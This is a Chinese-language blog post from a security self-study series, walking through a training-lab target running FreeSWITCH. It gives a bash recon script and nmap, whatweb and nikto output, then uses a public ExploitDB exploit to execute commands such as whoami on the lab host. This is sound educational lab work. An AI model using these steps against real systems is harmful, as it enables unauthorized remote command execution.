[鐵人賽] Day 27：暑期培訓(八) - /FreeSWITCH - iT 邦幫忙::一起幫忙解決難題，拯救 IT 人的一天

2024 iThome 鐵人賽

DAY 27

佛心分享-IT 人自學之術

從0到1的攻擊手自學之旅系列第 27 篇

[鐵人賽] Day 27：暑期培訓(八) - /FreeSWITCH

16th鐵人賽

Finley

2024-10-07 06:19:31

90 瀏覽

分享至

SOP

打開putty

sudo openvpn --config xxx
nmap -p- $rhost
nikto -host $rhost
dirb $rhost

以上是我實際操作過許多台靶機後，訂出上一篇文章的SOP發現一步一步操作太浪費時間，所以每一台新靶機至少會開啟4個個終端機頁面。所以上面的類別是同步執行的，當然nmap -p-還要人工去寫到下一筆指令參數有點過時，要改自動化sh然後可以省去這一大段工作。我把程式碼分享在下面，執行前需要chome +x變更權限，sh執行順序是先設定$rhost然後nmap -p-，如果發現80就whatweb，最後是把所有找到的port跑一遍nmap -sC -sV -A。

下面的程式碼我存成step1.sh，第一次使用前要chmod +x step1.sh變更權限才能執行。

#!/bin/bash

# Check if an argument was provided
if [ "$#" -ne 1 ]; then
    echo "Usage: sudo $0 IP"
    exit 1
fi

# Set the variable rhost to the first argument
rhost=$1

echo "Starting initial scan on $rhost"

# Initial fast scan to find open ports
open_ports=$(sudo nmap -sS -Pn -T4 -p- --min-rate=1000 $rhost | grep '/tcp' | grep open | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')

echo "Open ports: $open_ports"

# Check if any ports were found
if [ -z "$open_ports" ]; then
    echo "No open ports found. Exiting."
    exit 1
fi

# Check if port 80 is open
if [[ "$open_ports" =~ "80" ]]; then
    echo "Port 80 is open. Running WhatWeb on $rhost"
    whatweb $rhost
fi

echo "Starting detailed scan on ports $open_ports"

# Detailed scan on discovered ports
sudo nmap -sC -sV -A -vv -p $open_ports $rhost

echo "Detailed scan completed."

$rhost

┌──(kali㉿kali)-[~]
└─$ rhost='172.16.x.x'

nmap

┌──(kali㉿kali)-[~]
└─$ nmap -p- $rhost

┌──(kali㉿kali)-[~]
└─$ nmap -p22,80,443 -sC -sV -O $rhost

Bash Shell Script

┌──(kali㉿kali)-[~]
└─$ sudo ./Downloads/step1.sh $rhost
Starting initial scan on 172.16.x.x
Open ports: 135,139,445,2855,2856,3306,5060,5066,5080,5985,7443,8021,8081,8082,47001,49152,49153,49154,49155,49156,49157,49158
Port 80 is open. Running WhatWeb on 172.16.x.x
ERROR Opening: http://172.16.x.x - Connection refused - connect(2) for "172.16.x.x" port 80
Starting detailed scan on ports 135,139,445,2855,2856,3306,5060,5066,5080,5985,7443,8021,8081,8082,47001,49152,49153,49154,49155,49156,49157,49158
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-03 10:43 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.


PORT      STATE SERVICE          REASON          VERSION
135/tcp   open  msrpc            syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn      syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds     syn-ack ttl 127 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
2855/tcp  open  msrp?            syn-ack ttl 127
2856/tcp  open  ssl/cesdinv?     syn-ack ttl 127
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=FreeSWITCH/countryName=US
| Issuer: commonName=FreeSWITCH/countryName=US

3306/tcp  open  mysql?           syn-ack ttl 127
| mysql-info:
|_  MySQL Error: Host '192.168.200.7' is not allowed to connect to this MariaDB server
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, GetRequest, HTTPOptions, Help, Kerberos, NULL, RPCCheck, RTSPRequest, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, X11Probe:
|_    Host '192.168.200.7' is not allowed to connect to this MariaDB server
5060/tcp  open  sip-proxy        syn-ack ttl 127 FreeSWITCH mod_sofia 1.10.1~64bit
|_sip-methods: INVITE, ACK, BYE, CANCEL, OPTIONS, MESSAGE, INFO, UPDATE, REGISTER, REFER, NOTIFY, PUBLISH, SUBSCRIBE
5066/tcp  open  websocket        syn-ack ttl 127 (WebSocket version: 13)
| fingerprint-strings:
|   GenericLines, GetRequest, HTTPOptions:
|     HTTP/1.1 400 Bad Request
|_    Sec-WebSocket-Version: 13
5080/tcp  open  sip-proxy        syn-ack ttl 127 FreeSWITCH mod_sofia 1.10.1~64bit
5985/tcp  open  http             syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7443/tcp  open  ssl/websocket    syn-ack ttl 127 (WebSocket version: 13)

8021/tcp  open  freeswitch-event syn-ack ttl 127 FreeSWITCH mod_event_socket
8081/tcp  open  websocket        syn-ack ttl 127 (WebSocket version: 13)
|_mcafee-epo-agent: ePO Agent not found
| fingerprint-strings:
|   GenericLines, GetRequest, HTTPOptions:
|     HTTP/1.1 400 Bad Request
|_    Sec-WebSocket-Version: 13
8082/tcp  open  ssl/websocket    syn-ack ttl 127 (WebSocket version: 13)
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings:
|   GenericLines, GetRequest, HTTPOptions:
|     HTTP/1.1 400 Bad Request
|_    Sec-WebSocket-Version: 13
| ssl-cert: Subject: commonName=FreeSWITCH/countryName=US
| Issuer: commonName=FreeSWITCH/countryName=US

47001/tcp open  http             syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open  msrpc            syn-ack ttl 127 Microsoft Windows RPC
49153/tcp open  msrpc            syn-ack ttl 127 Microsoft Windows RPC
49154/tcp open  msrpc            syn-ack ttl 127 Microsoft Windows RPC
49155/tcp open  msrpc            syn-ack ttl 127 Microsoft Windows RPC
49156/tcp open  msrpc            syn-ack ttl 127 Microsoft Windows RPC
49157/tcp open  msrpc            syn-ack ttl 127 Microsoft Windows RPC
49158/tcp open  msrpc            syn-ack ttl 127 Microsoft Windows RPC
4 services unrecognized despite returning data. If you know the service/version, please submit the 

Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Detailed scan completed.

5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8021/tcp open freeswitch-event syn-ack ttl 127 FreeSWITCH mod_event_socket

whatweb

┌──(kali㉿kali)-[~]
└─$ whatweb $rhost:5985
http://172.16.x.x:5985 [404 Not Found] Country[RESERVED][ZZ], HTTPServer[Microsoft-HTTPAPI/2.0], IP[172.16.x.x], Microsoft-HTTPAPI[2.0], Title[Not Found]

nikto

┌──(kali㉿kali)-[~]
└─$ nikto -host http://$rhost:5985
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          172.16.x.x
+ Target Hostname:    172.16.x.x
+ Target Port:        5985
+ Start Time:         2024-10-03 10:57:32 (GMT-4)
---------------------------------------------------------------------------
+ Server: Microsoft-HTTPAPI/2.0
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/

searchsploit

┌──(kali㉿kali)-[~]
└─$ searchsploit FreeSWITCH
----------------------------------------------------------- ---------------------------------
 Exploit Title                                             |  Path
----------------------------------------------------------- ---------------------------------
FreeSWITCH - Event Socket Command Execution (Metasploit)   | multiple/remote/47698.rb
FreeSWITCH 1.10.1 - Command Execution                      | windows/remote/47799.txt
----------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(kali㉿kali)-[~]
└─$ searchsploit -m windows/remote/47799.txt
  Exploit: FreeSWITCH 1.10.1 - Command Execution
      URL: https://www.exploit-db.com/exploits/47799
     Path: /usr/share/exploitdb/exploits/windows/remote/47799.txt
    Codes: N/A
 Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/47799.txt

python

-- Example --
root@kali:~# ./freeswitch-exploit.py 192.168.1.100 whoami

┌──(kali㉿kali)-[~]
└─$ mv 47799.txt freeswitch-exploit.py

┌──(kali㉿kali)-[~]
└─$ python3 freeswitch-exploit.py $rhost whoami
Authenticated
Content-Type: api/response
Content-Length: 23

win-fh0n2vgindj\offsec

┌──(kali㉿kali)-[~]
└─$ python3 freeswitch-exploit.py $rhost 'cd'
Authenticated
Content-Type: api/response
Content-Length: 28

C:\Program Files\FreeSWITCH